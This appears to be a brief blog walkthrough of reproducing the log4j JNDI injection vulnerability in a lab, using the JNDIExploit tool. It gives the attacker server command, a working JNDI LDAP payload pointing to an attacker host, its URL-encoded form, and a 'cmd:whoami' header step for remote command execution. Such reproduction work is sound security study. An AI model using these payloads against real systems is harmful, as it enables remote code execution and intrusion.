Use of JNDIExploit-1.2-SNAPSHOT.jar tool in log4j vulnerability reproduction

Language 2023-09-11 20:17:55 views: null

1. First build the log4j shooting range
Insert image description here
Insert image description here

2. Start the service
Windows attacker executes the following command
java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888 -p 9999 -i 127.0.0.1
Insert image description here

Open another cmd to see what payload can be used
java -jar JNDIExploit-1.2-SNAPSHOT.jar -u
Insert image description here

You can try the above payloads. We use
ldap://null:1389/TomcatBypass/TomcatEcho
3. Construct the request
${jndi:ldap://192.168.155.2:8888/TomcatBypass/TomcatEcho}
and convert it to URL
%24%7Bjndi%3Aldap %3A//192.168.155.2%3A8888/TomcatBypass/TomcatEcho%7D
4. Add cmd:whoami to the bp
request packet
Insert image description here

After execution, it is found that the command can be executed
Insert image description here

Supongo que te gusta

Origin blog.csdn.net/wutiangui/article/details/132733709
Recomendado
Clasificación
Diario
Más
2024-05-06(4)
2024-05-05(0)
2024-05-04(17)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(33)
2024-04-29(5)
2024-04-28(9)
2024-04-27(28)

Code World

© 2018 codetd.com